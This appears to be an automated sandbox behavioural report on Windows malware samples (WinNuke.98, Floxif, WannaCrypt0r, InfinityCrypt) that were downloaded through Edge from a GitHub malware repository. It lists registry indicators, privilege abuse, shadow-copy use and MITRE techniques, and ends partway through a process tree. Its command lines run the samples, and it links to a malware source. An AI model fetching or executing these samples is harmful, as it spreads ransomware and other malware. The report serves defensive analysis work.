Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PcAppStore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gnil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinNuke.98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Floxif.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Floxif.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

[email protected][email protected]

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	[email protected]
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	[email protected]
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	[email protected]
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	[email protected]

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

NW_store.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	NW_store.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	NW_store.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	NW_store.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

NW_store.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133671838051742529"	NW_store.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	NW_store.exe

Modifies registry class 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-242286936-336880687-2152680090-1000\{50DDC43B-FD65-487A-9EF5-6145E46DC848}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3500 reg.exe

pid	process
3500	reg.exe

NTFS ADS 12 IoCs

Processes:

msedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exeNW_store.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Setup.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Gnil.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCrypt0r (1).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 510523.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 431514.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Floxif.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 322198.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\InfinityCrypt.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WinNuke.98.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 422248.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\PCAppStore\assets\images\css2?family=Inter:wght@400;500;600;700&family=Open+Sans:wght@400;600;700&family=Roboto:wght@400;500;700&display=swap	NW_store.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCrypt0r.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exeSetup.exemsedge.exeGnil.exespoclsv.exensd9C7.tmpWatchdog.exePcAppStore.exeNW_store.exeNW_store.exe

pid	process
5076	msedge.exe
5076	msedge.exe
2408	msedge.exe
2408	msedge.exe
4956	identity_helper.exe
4956	identity_helper.exe
2032	msedge.exe
2032	msedge.exe
4420	msedge.exe
4420	msedge.exe
3432	msedge.exe
3432	msedge.exe
4540	msedge.exe
4540	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2096	msedge.exe
2096	msedge.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
1000	msedge.exe
1000	msedge.exe
880	Gnil.exe
880	Gnil.exe
880	Gnil.exe
880	Gnil.exe
880	Gnil.exe
880	Gnil.exe
4780	spoclsv.exe
4780	spoclsv.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
4048	Setup.exe
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
1636	nsd9C7.tmp
2192	Watchdog.exe
2192	Watchdog.exe
2192	Watchdog.exe
2192	Watchdog.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
5088	NW_store.exe
5088	NW_store.exe
5088	NW_store.exe
5088	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 39 IoCs

Processes:

msedge.exe

pid	process
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Floxif.exeFloxif.exeFloxif.exeNW_store.exemsiexec.exeAUDIODG.EXE

description	pid	process
Token: SeDebugPrivilege	4832	Floxif.exe
Token: SeDebugPrivilege	1860	Floxif.exe
Token: SeDebugPrivilege	2212	Floxif.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeSecurityPrivilege	5816	msiexec.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: 33	6556	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	6556	AUDIODG.EXE
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe
Token: SeShutdownPrivilege	2928	NW_store.exe
Token: SeCreatePagefilePrivilege	2928	NW_store.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe

Suspicious use of SendNotifyMessage 28 IoCs

Processes:

msedge.exePcAppStore.exe

pid	process
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
4796	PcAppStore.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

msedge.exePcAppStore.exeNW_store.exe

pid	process
2408	msedge.exe
2408	msedge.exe
4796	PcAppStore.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
4796	PcAppStore.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2408	msedge.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2928	NW_store.exe
2408	msedge.exe
2408	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2408 wrote to memory of 3356	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 3356	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5028	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5076	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 5076	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe
PID 2408 wrote to memory of 4592	2408	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

4048 attrib.exe
6820 attrib.exe

pid	process
4048	attrib.exe
6820	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Virus/WinNuke.98.exe
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff0db83cb8,0x7fff0db83cc8,0x7fff0db83cd8
2⤵
PID:3356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:2
2⤵
PID:5028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
2⤵
PID:4592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
2⤵
PID:400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
2⤵
PID:3624

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
2⤵
PID:4048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
2⤵
PID:2068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
2⤵
PID:4140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
2⤵
PID:2028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
2⤵
PID:1640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6140 /prefetch:8
2⤵
PID:1956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4772 /prefetch:8
2⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4420

C:\Users\Admin\Downloads\WinNuke.98.exe
"C:\Users\Admin\Downloads\WinNuke.98.exe"
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
2⤵
PID:3732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3368 /prefetch:8
2⤵
PID:2876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2916 /prefetch:8
2⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3432

C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 456
3⤵
- Program crash
PID:956

C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1860

